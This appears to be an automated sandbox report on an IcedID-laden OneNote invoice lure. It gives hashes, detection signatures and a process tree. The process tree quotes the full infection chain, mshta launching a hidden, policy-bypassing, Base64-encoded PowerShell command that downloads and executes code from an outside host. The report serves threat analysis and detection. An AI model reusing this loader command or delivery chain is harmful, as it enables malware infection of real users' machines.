Windows Analysis Report
Inv_02_02_#6.one

Overview

General Information

Sample Name:Inv_02_02_#6.one
Analysis ID:797394
MD5:436d3e6c17fca8ec8f58061720feacb7
SHA1:5e531fb72d6b4baef2c58b5f28f93071d7fb2cb7
SHA256:9ab0514b205de5ea60ad1f2ee168f668b4c0af839b8c7c8b80d39c31a24d2119
Infos:

Detection

IcedID
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Malicious OneNote
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Yara detected Powershell download and execute
Snort IDS alert for network traffic
Yara detected IcedID
PowerShell case anomaly found
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Suspicious powershell command line found
Powershell drops PE file
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Creates a start menu entry (Start Menu\Programs\Startup)
Found large amount of non-executed APIs
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • ONENOTE.EXE (PID: 1972 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Inv_02_02_#6.one MD5: 8D7E99CB358318E1F38803C9E6B67867)
    • ONENOTEM.EXE (PID: 2040 cmdline: /tsr MD5: DBCFA6F25577339B877D2305CAD3DEC3)
  • mshta.exe (PID: 2100 cmdline: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Local\Temp\Open.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} MD5: 7083239CE743FDB68DFC933B7308E80A)
    • cmd.exe (PID: 1784 cmdline: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAHIAcwBhAG4AYQB2AGUALgB0AG8AcAAvAGcAYQB0AGUAZgAuAHAAaABwACIAKQA= MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)